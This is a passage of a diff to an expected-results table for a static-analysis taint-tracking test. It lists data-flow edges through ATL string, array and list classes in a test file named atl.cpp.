... | | -| atl.cpp:511:10:511:11 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | -| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:516:16:516:16 | w | | -| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:520:15:520:15 | w | | -| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:524:20:524:20 | w | | -| atl.cpp:516:16:516:16 | ref arg w | atl.cpp:520:15:520:15 | w | | -| atl.cpp:516:16:516:16 | ref arg w | atl.cpp:524:20:524:20 | w | | -| atl.cpp:516:16:516:16 | w | atl.cpp:516:16:516:17 | call to CComBSTR | TAINT | -| atl.cpp:516:16:516:17 | call to CComBSTR | atl.cpp:517:10:517:10 | b | | -| atl.cpp:516:16:516:17 | call to CComBSTR | atl.cpp:522:3:522:3 | b | | -| atl.cpp:517:10:517:10 | b [post update] | atl.cpp:522:3:522:3 | b | | -| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:520:5:520:6 | b2 | | -| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:521:10:521:11 | b2 | | -| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:522:3:522:3 | b2 | | -| atl.cpp:520:5:520:6 | ref arg b2 | atl.cpp:521:10:521:11 | b2 | | -| atl.cpp:520:5:520:6 | ref arg b2 | atl.cpp:522:3:522:3 | b2 | | -| atl.cpp:520:15:520:15 | ref arg w | atl.cpp:524:20:524:20 | w | | -| atl.cpp:521:10:521:11 | b2 [post update] | atl.cpp:522:3:522:3 | b2 | | -| atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:525:10:525:10 | b | | -| atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:526:3:526:3 | b | | -| atl.cpp:525:10:525:10 | b [post update] | atl.cpp:526:3:526:3 | b | | -| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:572:8:572:11 | safe | | -| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:574:24:574:27 | safe | | -| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:585:11:585:14 | safe | | -| atl.cpp:572:8:572:11 | safe [post update] | atl.cpp:574:24:574:27 | safe | | -| atl.cpp:572:8:572:11 | safe [post update] | atl.cpp:585:11:585:14 | safe | | -| atl.cpp:574:24:574:27 | safe | atl.cpp:574:24:574:28 | call to CComSafeArray | TAINT | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:575:8:575:8 | c | | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:576:8:576:8 | c | | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:577:8:577:8 | c | | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:578:8:578:8 | c | | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:579:3:579:3 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:576:8:576:8 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:577:8:577:8 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:578:8:578:8 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:33:30:33:30 | 1 | atl.cpp:33:29:33:30 | - ... | TAINT | +| atl.cpp:77:14:77:25 | call to source | atl.cpp:78:21:78:21 | x | | +| atl.cpp:78:21:78:21 | x | atl.cpp:78:21:78:22 | call to _U_STRINGorID | TAINT | +| atl.cpp:78:21:78:22 | call to _U_STRINGorID | atl.cpp:79:10:79:10 | u | | +| atl.cpp:83:17:83:43 | call to indirect_source | atl.cpp:84:21:84:21 | y | | +| atl.cpp:84:21:84:21 | y | atl.cpp:84:21:84:22 | call to _U_STRINGorID | TAINT | +| atl.cpp:84:21:84:22 | call to _U_STRINGorID | atl.cpp:85:10:85:10 | u | | +| atl.cpp:104:15:104:35 | call to indirect_source | atl.cpp:105:19:105:19 | x | | +| atl.cpp:105:19:105:19 | x | atl.cpp:105:19:105:20 | call to CA2AEX | TAINT | +| atl.cpp:105:19:105:20 | call to CA2AEX | atl.cpp:106:29:106:29 | a | | +| atl.cpp:105:19:105:20 | call to CA2AEX | atl.cpp:107:10:107:10 | a | | +| atl.cpp:105:19:105:20 | call to CA2AEX | atl.cpp:108:10:108:10 | a | | +| atl.cpp:105:19:105:20 | call to CA2AEX | atl.cpp:109:3:109:3 | a | | +| atl.cpp:106:29:106:29 | ref arg a | atl.cpp:107:10:107:10 | a | | +| atl.cpp:106:29:106:29 | ref arg a | atl.cpp:108:10:108:10 | a | | +| atl.cpp:106:29:106:29 | ref arg a | atl.cpp:109:3:109:3 | a | | +| atl.cpp:107:10:107:10 | a [post update] | atl.cpp:108:10:108:10 | a | | +| atl.cpp:107:10:107:10 | a [post update] | atl.cpp:109:3:109:3 | a | | +| atl.cpp:108:10:108:10 | a [post update] | atl.cpp:109:3:109:3 | a | | +| atl.cpp:112:15:112:35 | call to indirect_source | atl.cpp:113:19:113:19 | x | | +| atl.cpp:113:19:113:23 | call to CA2AEX | atl.cpp:114:29:114:29 | a | | +| atl.cpp:113:19:113:23 | call to CA2AEX | atl.cpp:115:10:115:10 | a | | +| atl.cpp:113:19:113:23 | call to CA2AEX | atl.cpp:116:10:116:10 | a | | +| atl.cpp:113:19:113:23 | call to CA2AEX | atl.cpp:117:3:117:3 | a | | +| atl.cpp:114:29:114:29 | ref arg a | atl.cpp:115:10:115:10 | a | | +| atl.cpp:114:29:114:29 | ref arg a | atl.cpp:116:10:116:10 | a | | +| atl.cpp:114:29:114:29 | ref arg a | atl.cpp:117:3:117:3 | a | | +| atl.cpp:115:10:115:10 | a [post update] | atl.cpp:116:10:116:10 | a | | +| atl.cpp:115:10:115:10 | a [post update] | atl.cpp:117:3:117:3 | a | | +| atl.cpp:116:10:116:10 | a [post update] | atl.cpp:117:3:117:3 | a | | +| atl.cpp:130:14:130:34 | call to indirect_source | atl.cpp:132:20:132:20 | x | | +| atl.cpp:130:14:130:34 | call to indirect_source | atl.cpp:138:20:138:20 | x | | +| atl.cpp:132:20:132:20 | x | atl.cpp:132:20:132:21 | call to CA2CAEX | TAINT | +| atl.cpp:132:20:132:21 | call to CA2CAEX | atl.cpp:133:30:133:30 | a | | +| atl.cpp:132:20:132:21 | call to CA2CAEX | atl.cpp:134:10:134:10 | a | | +| atl.cpp:132:20:132:21 | call to CA2CAEX | atl.cpp:135:10:135:10 | a | | +| atl.cpp:132:20:132:21 | call to CA2CAEX | atl.cpp:136:3:136:3 | a | | +| atl.cpp:138:20:138:24 | call to CA2CAEX | atl.cpp:139:30:139:30 | a | | +| atl.cpp:138:20:138:24 | call to CA2CAEX | atl.cpp:140:10:140:10 | a | | +| atl.cpp:138:20:138:24 | call to CA2CAEX | atl.cpp:141:10:141:10 | a | | +| atl.cpp:138:20:138:24 | call to CA2CAEX | atl.cpp:142:3:142:3 | a | | +| atl.cpp:156:14:156:34 | call to indirect_source | atl.cpp:158:19:158:19 | x | | +| atl.cpp:156:14:156:34 | call to indirect_source | atl.cpp:164:19:164:19 | x | | +| atl.cpp:158:19:158:19 | x | atl.cpp:158:19:158:20 | call to CA2WEX | TAINT | +| atl.cpp:158:19:158:20 | call to CA2WEX | atl.cpp:159:30:159:30 | a | | +| atl.cpp:158:19:158:20 | call to CA2WEX | atl.cpp:160:10:160:10 | a | | +| atl.cpp:158:19:158:20 | call to CA2WEX | atl.cpp:161:10:161:10 | a | | +| atl.cpp:158:19:158:20 | call to CA2WEX | atl.cpp:162:3:162:3 | a | | +| atl.cpp:159:30:159:30 | ref arg a | atl.cpp:160:10:160:10 | a | | +| atl.cpp:159:30:159:30 | ref arg a | atl.cpp:161:10:161:10 | a | | +| atl.cpp:159:30:159:30 | ref arg a | atl.cpp:162:3:162:3 | a | | +| atl.cpp:160:10:160:10 | a [post update] | atl.cpp:161:10:161:10 | a | | +| atl.cpp:160:10:160:10 | a [post update] | atl.cpp:162:3:162:3 | a | | +| atl.cpp:160:12:160:16 | ref arg m_psz | atl.cpp:161:12:161:16 | m_psz | | +| atl.cpp:161:10:161:10 | a [post update] | atl.cpp:162:3:162:3 | a | | +| atl.cpp:164:19:164:23 | call to CA2WEX | atl.cpp:165:30:165:30 | a | | +| atl.cpp:164:19:164:23 | call to CA2WEX | atl.cpp:166:10:166:10 | a | | +| atl.cpp:164:19:164:23 | call to CA2WEX | atl.cpp:167:10:167:10 | a | | +| atl.cpp:164:19:164:23 | call to CA2WEX | atl.cpp:168:3:168:3 | a | | +| atl.cpp:165:30:165:30 | ref arg a | atl.cpp:166:10:166:10 | a | | +| atl.cpp:165:30:165:30 | ref arg a | atl.cpp:167:10:167:10 | a | | +| atl.cpp:165:30:165:30 | ref arg a | atl.cpp:168:3:168:3 | a | | +| atl.cpp:166:10:166:10 | a [post update] | atl.cpp:167:10:167:10 | a | | +| atl.cpp:166:10:166:10 | a [post update] | atl.cpp:168:3:168:3 | a | | +| atl.cpp:166:12:166:16 | ref arg m_psz | atl.cpp:167:12:167:16 | m_psz | | +| atl.cpp:167:10:167:10 | a [post update] | atl.cpp:168:3:168:3 | a | | +| atl.cpp:216:11:216:21 | call to source | atl.cpp:220:11:220:11 | x | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:220:5:220:5 | a | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:221:10:221:10 | a | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:222:5:222:5 | a | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:223:10:223:10 | a | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:227:15:227:15 | a | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:242:3:242:3 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:221:10:221:10 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:222:5:222:5 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:223:10:223:10 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:227:15:227:15 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:242:3:242:3 | a | | +| atl.cpp:221:10:221:10 | ref arg a | atl.cpp:222:5:222:5 | a | | +| atl.cpp:221:10:221:10 | ref arg a | atl.cpp:223:10:223:10 | a | | +| atl.cpp:221:10:221:10 | ref arg a | atl.cpp:227:15:227:15 | a | | +| atl.cpp:221:10:221:10 | ref arg a | atl.cpp:242:3:242:3 | a | | +| atl.cpp:222:5:222:5 | ref arg a | atl.cpp:223:10:223:10 | a | | +| atl.cpp:222:5:222:5 | ref arg a | atl.cpp:227:15:227:15 | a | | +| atl.cpp:222:5:222:5 | ref arg a | atl.cpp:242:3:242:3 | a | | +| atl.cpp:223:10:223:10 | ref arg a | atl.cpp:227:15:227:15 | a | | +| atl.cpp:223:10:223:10 | ref arg a | atl.cpp:242:3:242:3 | a | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:226:10:226:11 | a2 | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:227:5:227:6 | a2 | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:228:10:228:11 | a2 | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:232:13:232:14 | a2 | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:242:3:242:3 | a2 | | +| atl.cpp:226:10:226:11 | ref arg a2 | atl.cpp:227:5:227:6 | a2 | | +| atl.cpp:226:10:226:11 | ref arg a2 | atl.cpp:228:10:228:11 | a2 | | +| atl.cpp:226:10:226:11 | ref arg a2 | atl.cpp:232:13:232:14 | a2 | | +| atl.cpp:226:10:226:11 | ref arg a2 | atl.cpp:242:3:242:3 | a2 | | +| atl.cpp:227:5:227:6 | ref arg a2 | atl.cpp:228:10:228:11 | a2 | | +| atl.cpp:227:5:227:6 | ref arg a2 | atl.cpp:232:13:232:14 | a2 | | +| atl.cpp:227:5:227:6 | ref arg a2 | atl.cpp:242:3:242:3 | a2 | | +| atl.cpp:228:10:228:11 | ref arg a2 | atl.cpp:232:13:232:14 | a2 | | +| atl.cpp:228:10:228:11 | ref arg a2 | atl.cpp:242:3:242:3 | a2 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:231:10:231:11 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:232:5:232:6 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:233:10:233:11 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:235:10:235:11 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:232:5:232:6 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:233:10:233:11 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:235:10:235:11 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:233:10:233:11 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:235:10:235:11 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:233:10:233:11 | ref arg a3 | atl.cpp:235:10:235:11 | a3 | | +| atl.cpp:233:10:233:11 | ref arg a3 | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:233:10:233:11 | ref arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:233:10:233:11 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:235:10:235:11 | ref arg a3 | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:235:10:235:11 | ref arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:235:10:235:11 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:236:11:236:12 | ref arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:236:11:236:12 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:236:14:236:20 | call to GetData | atl.cpp:236:10:236:22 | * ... | TAINT | +| atl.cpp:238:20:238:21 | call to CAtlArray | atl.cpp:239:10:239:11 | a4 | | +| atl.cpp:238:20:238:21 | call to CAtlArray | atl.cpp:240:5:240:6 | a4 | | +| atl.cpp:238:20:238:21 | call to CAtlArray | atl.cpp:241:10:241:11 | a4 | | +| atl.cpp:238:20:238:21 | call to CAtlArray | atl.cpp:242:3:242:3 | a4 | | +| atl.cpp:239:10:239:11 | ref arg a4 | atl.cpp:240:5:240:6 | a4 | | +| atl.cpp:239:10:239:11 | ref arg a4 | atl.cpp:241:10:241:11 | a4 | | +| atl.cpp:239:10:239:11 | ref arg a4 | atl.cpp:242:3:242:3 | a4 | | +| atl.cpp:240:5:240:6 | ref arg a4 | atl.cpp:241:10:241:11 | a4 | | +| atl.cpp:240:5:240:6 | ref arg a4 | atl.cpp:242:3:242:3 | a4 | | +| atl.cpp:240:26:240:27 | a3 | atl.cpp:240:25:240:27 | & ... | | +| atl.cpp:241:10:241:11 | ref arg a4 | atl.cpp:242:3:242:3 | a4 | | +| atl.cpp:244:20:244:21 | call to CAtlArray | atl.cpp:245:5:245:6 | a5 | | +| atl.cpp:244:20:244:21 | call to CAtlArray | atl.cpp:246:10:246:11 | a5 | | +| atl.cpp:244:20:244:21 | call to CAtlArray | atl.cpp:251:3:251:3 | a5 | | +| atl.cpp:245:5:245:6 | ref arg a5 | atl.cpp:246:10:246:11 | a5 | | +| atl.cpp:245:5:245:6 | ref arg a5 | atl.cpp:251:3:251:3 | a5 | | +| atl.cpp:246:10:246:11 | ref arg a5 | atl.cpp:251:3:251:3 | a5 | | +| atl.cpp:248:20:248:21 | call to CAtlArray | atl.cpp:249:5:249:6 | a6 | | +| atl.cpp:248:20:248:21 | call to CAtlArray | atl.cpp:250:10:250:11 | a6 | | +| atl.cpp:248:20:248:21 | call to CAtlArray | atl.cpp:251:3:251:3 | a6 | | +| atl.cpp:249:5:249:6 | ref arg a6 | atl.cpp:250:10:250:11 | a6 | | +| atl.cpp:249:5:249:6 | ref arg a6 | atl.cpp:251:3:251:3 | a6 | | +| atl.cpp:250:10:250:11 | ref arg a6 | atl.cpp:251:3:251:3 | a6 | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:300:18:300:18 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:308:19:308:19 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:317:29:317:29 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:323:21:323:21 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:331:30:331:30 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:338:31:338:31 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:343:44:343:44 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:352:18:352:18 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:360:19:360:19 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:369:29:369:29 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:375:21:375:21 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:383:30:383:30 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:390:31:390:31 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:395:44:395:44 | x | | +| atl.cpp:298:24:298:25 | 10 | atl.cpp:298:24:298:26 | call to CAtlList | TAINT | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:299:10:299:13 | list | | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:300:5:300:8 | list | | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:301:10:301:13 | list | | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:304:24:304:27 | list | | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:346:3:346:3 | list | | +| atl.cpp:299:10:299:13 | ref arg list | atl.cpp:300:5:300:8 | list | | +| atl.cpp:299:10:299:13 | ref arg list | atl.cpp:301:10:301:13 | list | | +| atl.cpp:299:10:299:13 | ref arg list | atl.cpp:304:24:304:27 | list | | +| atl.cpp:299:10:299:13 | ref arg list | atl.cpp:346:3:346:3 | list | | +| atl.cpp:300:5:300:8 | ref arg list | atl.cpp:301:10:301:13 | list | | +| atl.cpp:300:5:300:8 | ref arg list | atl.cpp:304:24:304:27 | list | | +| atl.cpp:300:5:300:8 | ref arg list | atl.cpp:346:3:346:3 | list | | +| atl.cpp:301:10:301:13 | ref arg list | atl.cpp:304:24:304:27 | list | | +| atl.cpp:301:10:301:13 | ref arg list | atl.cpp:346:3:346:3 | list | | +| atl.cpp:303:25:303:26 | 10 | atl.cpp:303:25:303:27 | call to CAtlList | TAINT | +| atl.cpp:303:25:303:27 | call to CAtlList | atl.cpp:304:5:304:9 | list2 | | +| atl.cpp:303:25:303:27 | call to CAtlList | atl.cpp:305:10:305:14 | list2 | | +| atl.cpp:303:25:303:27 | call to CAtlList | atl.cpp:346:3:346:3 | list2 | | +| atl.cpp:304:5:304:9 | ref arg list2 | atl.cpp:305:10:305:14 | list2 | | +| atl.cpp:304:5:304:9 | ref arg list2 | atl.cpp:346:3:346:3 | list2 | | +| atl.cpp:304:24:304:27 | list | atl.cpp:304:23:304:27 | & ... | | +| atl.cpp:305:10:305:14 | ref arg list2 | atl.cpp:346:3:346:3 | list2 | | +| atl.cpp:307:25:307:26 | 10 | atl.cpp:307:25:307:27 | call to CAtlList | TAINT | +| atl.cpp:307:25:307:27 | call to CAtlList | atl.cpp:308:5:308:9 | list3 | | +| atl.cpp:307:25:307:27 | call to CAtlList | atl.cpp:309:10:309:14 | list3 | | +| atl.cpp:307:25:307:27 | call to CAtlList | atl.cpp:312:24:312:28 | list3 | | +| atl.cpp:307:25:307:27 | call to CAtlList | atl.cpp:346:3:346:3 | list3 | | +| atl.cpp:308:5:308:9 | ref arg list3 | atl.cpp:309:10:309:14 | list3 | | +| atl.cpp:308:5:308:9 | ref arg list3 | atl.cpp:312:24:312:28 | list3 | | +| atl.cpp:308:5:308:9 | ref arg list3 | atl.cpp:346:3:346:3 | list3 | | +| atl.cpp:309:10:309:14 | ref arg list3 | atl.cpp:312:24:312:28 | list3 | | +| atl.cpp:309:10:309:14 | ref arg list3 | atl.cpp:346:3:346:3 | list3 | | +| atl.cpp:311:25:311:26 | 10 | atl.cpp:311:25:311:27 | call to CAtlList | TAINT | +| atl.cpp:311:25:311:27 | call to CAtlList | atl.cpp:312:5:312:9 | list4 | | +| atl.cpp:311:25:311:27 | call to CAtlList | atl.cpp:313:10:313:14 | list4 | | +| atl.cpp:311:25:311:27 | call to CAtlList | atl.cpp:346:3:346:3 | list4 | | +| atl.cpp:312:5:312:9 | ref arg list4 | atl.cpp:313:10:313:14 | list4 | | +| atl.cpp:312:5:312:9 | ref arg list4 | atl.cpp:346:3:346:3 | list4 | | +| atl.cpp:312:24:312:28 | list3 | atl.cpp:312:23:312:28 | & ... | | +| atl.cpp:313:10:313:14 | ref arg list4 | atl.cpp:346:3:346:3 | list4 | | +| atl.cpp:316:27:316:28 | 10 | atl.cpp:316:27:316:29 | call to CAtlList | TAINT | +| atl.cpp:316:27:316:29 | call to CAtlList | atl.cpp:317:18:317:22 | list5 | | +| atl.cpp:316:27:316:29 | call to CAtlList | atl.cpp:317:32:317:36 | list5 | | +| atl.cpp:316:27:316:29 | call to CAtlList | atl.cpp:318:12:318:16 | list5 | | +| atl.cpp:316:27:316:29 | call to CAtlList | atl.cpp:319:5:319:5 | list5 | | +| atl.cpp:317:18:317:22 | ref arg list5 | atl.cpp:318:12:318:16 | list5 | | +| atl.cpp:317:18:317:22 | ref arg list5 | atl.cpp:319:5:319:5 | list5 | | +| atl.cpp:317:24:317:27 | call to Find | atl.cpp:318:24:318:26 | pos | | +| atl.cpp:317:32:317:36 | ref arg list5 | atl.cpp:317:18:317:22 | list5 | | +| atl.cpp:317:32:317:36 | ref arg list5 | atl.cpp:318:12:318:16 | list5 | | +| atl.cpp:317:32:317:36 | ref arg list5 | atl.cpp:319:5:319:5 | list5 | | +| atl.cpp:318:12:318:16 | ref arg list5 | atl.cpp:319:5:319:5 | list5 | | +| atl.cpp:322:27:322:28 | 10 | atl.cpp:322:27:322:29 | call to CAtlList | TAINT | +| atl.cpp:322:27:322:29 | call to CAtlList | atl.cpp:323:7:323:11 | list6 | | +| atl.cpp:322:27:322:29 | call to CAtlList | atl.cpp:324:18:324:22 | list6 | | +| atl.cpp:322:27:322:29 | call to CAtlList | atl.cpp:325:12:325:16 | list6 | | +| atl.cpp:322:27:322:29 | call to CAtlList | atl.cpp:326:5:326:5 | list6 | | +| atl.cpp:323:7:323:11 | ref arg list6 | atl.cpp:324:18:324:22 | list6 | | +| atl.cpp:323:7:323:11 | ref arg list6 | atl.cpp:325:12:325:16 | list6 | | +| atl.cpp:323:7:323:11 | ref arg list6 | atl.cpp:326:5:326:5 | list6 | | +| atl.cpp:324:18:324:22 | ref arg list6 | atl.cpp:325:12:325:16 | list6 | | +| atl.cpp:324:18:324:22 | ref arg list6 | atl.cpp:326:5:326:5 | list6 | | +| atl.cpp:324:24:324:32 | call to FindIndex | atl.cpp:325:24:325:26 | pos | | +| atl.cpp:325:12:325:16 | ref arg list6 | atl.cpp:326:5:326:5 | list6 | | +| atl.cpp:329:27:329:28 | 10 | atl.cpp:329:27:329:29 | call to CAtlList | TAINT | +| atl.cpp:329:27:329:29 | call to CAtlList | atl.cpp:330:18:330:22 | list7 | | +| atl.cpp:329:27:329:29 | call to CAtlList | atl.cpp:331:7:331:11 | list7 | | +| atl.cpp:329:27:329:29 | call to CAtlList | atl.cpp:332:12:332:16 | list7 | | +| atl.cpp:329:27:329:29 | call to CAtlList | atl.cpp:333:5:333:5 | list7 | | +| atl.cpp:330:18:330:22 | ref arg list7 | atl.cpp:331:7:331:11 | list7 | | +| atl.cpp:330:18:330:22 | ref arg list7 | atl.cpp:332:12:332:16 | list7 | | +| atl.cpp:330:18:330:22 | ref arg list7 | atl.cpp:333:5:333:5 | list7 | | +| atl.cpp:330:24:330:38 | call to GetTailPosition | atl.cpp:331:25:331:27 | pos | | +| atl.cpp:331:7:331:11 | ref arg list7 | atl.cpp:332:12:332:16 | list7 | | +| atl.cpp:331:7:331:11 | ref arg list7 | atl.cpp:333:5:333:5 | list7 | | +| atl.cpp:332:12:332:16 | ref arg list7 | atl.cpp:333:5:333:5 | list7 | | +| atl.cpp:336:27:336:28 | 10 | atl.cpp:336:27:336:29 | call to CAtlList | TAINT | +| atl.cpp:336:27:336:29 | call to CAtlList | atl.cpp:337:18:337:22 | list8 | | +| atl.cpp:336:27:336:29 | call to CAtlList | atl.cpp:338:7:338:11 | list8 | | +| atl.cpp:336:27:336:29 | call to CAtlList | atl.cpp:339:12:339:16 | list8 | | +| atl.cpp:336:27:336:29 | call to CAtlList | atl.cpp:340:5:340:5 | list8 | | +| atl.cpp:337:18:337:22 | ref arg list8 | atl.cpp:338:7:338:11 | list8 | | +| atl.cpp:337:18:337:22 | ref arg list8 | atl.cpp:339:12:339:16 | list8 | | +| atl.cpp:337:18:337:22 | ref arg list8 | atl.cpp:340:5:340:5 | list8 | | +| atl.cpp:337:24:337:38 | call to GetTailPosition | atl.cpp:338:26:338:28 | pos | | +| atl.cpp:338:7:338:11 | ref arg list8 | atl.cpp:339:12:339:16 | list8 | | +| atl.cpp:338:7:338:11 | ref arg list8 | atl.cpp:340:5:340:5 | list8 | | +| atl.cpp:339:12:339:16 | ref arg list8 | atl.cpp:340:5:340:5 | list8 | | +| atl.cpp:342:27:342:28 | 10 | atl.cpp:342:27:342:29 | call to CAtlList | TAINT | +| atl.cpp:342:27:342:29 | call to CAtlList | atl.cpp:343:7:343:11 | list9 | | +| atl.cpp:342:27:342:29 | call to CAtlList | atl.cpp:343:19:343:23 | list9 | | +| atl.cpp:342:27:342:29 | call to CAtlList | atl.cpp:344:12:344:16 | list9 | | +| atl.cpp:342:27:342:29 | call to CAtlList | atl.cpp:345:5:345:5 | list9 | | +| atl.cpp:343:7:343:11 | ref arg list9 | atl.cpp:344:12:344:16 | list9 | | +| atl.cpp:343:7:343:11 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | +| atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:343:7:343:11 | list9 | | +| atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:344:12:344:16 | list9 | | +| atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | +| atl.cpp:344:12:344:16 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | +| atl.cpp:350:24:350:25 | 10 | atl.cpp:350:24:350:26 | call to CAtlList | TAINT | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:351:10:351:13 | list | | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:352:5:352:8 | list | | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:353:10:353:13 | list | | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:356:24:356:27 | list | | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:398:3:398:3 | list | | +| atl.cpp:351:10:351:13 | ref arg list | atl.cpp:352:5:352:8 | list | | +| atl.cpp:351:10:351:13 | ref arg list | atl.cpp:353:10:353:13 | list | | +| atl.cpp:351:10:351:13 | ref arg list | atl.cpp:356:24:356:27 | list | | +| atl.cpp:351:10:351:13 | ref arg list | atl.cpp:398:3:398:3 | list | | +| atl.cpp:352:5:352:8 | ref arg list | atl.cpp:353:10:353:13 | list | | +| atl.cpp:352:5:352:8 | ref arg list | atl.cpp:356:24:356:27 | list | | +| atl.cpp:352:5:352:8 | ref arg list | atl.cpp:398:3:398:3 | list | | +| atl.cpp:353:10:353:13 | ref arg list | atl.cpp:356:24:356:27 | list | | +| atl.cpp:353:10:353:13 | ref arg list | atl.cpp:398:3:398:3 | list | | +| atl.cpp:355:25:355:26 | 10 | atl.cpp:355:25:355:27 | call to CAtlList | TAINT | +| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:356:5:356:9 | list2 | | +| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:357:10:357:14 | list2 | | +| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:398:3:398:3 | list2 | | +| atl.cpp:356:5:356:9 | ref arg list2 | atl.cpp:357:10:357:14 | list2 | | +| atl.cpp:356:5:356:9 | ref arg list2 | atl.cpp:398:3:398:3 | list2 | | +| atl.cpp:356:24:356:27 | list | atl.cpp:356:23:356:27 | & ... | | +| atl.cpp:357:10:357:14 | ref arg list2 | atl.cpp:398:3:398:3 | list2 | | +| atl.cpp:359:25:359:26 | 10 | atl.cpp:359:25:359:27 | call to CAtlList | TAINT | +| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:360:5:360:9 | list3 | | +| 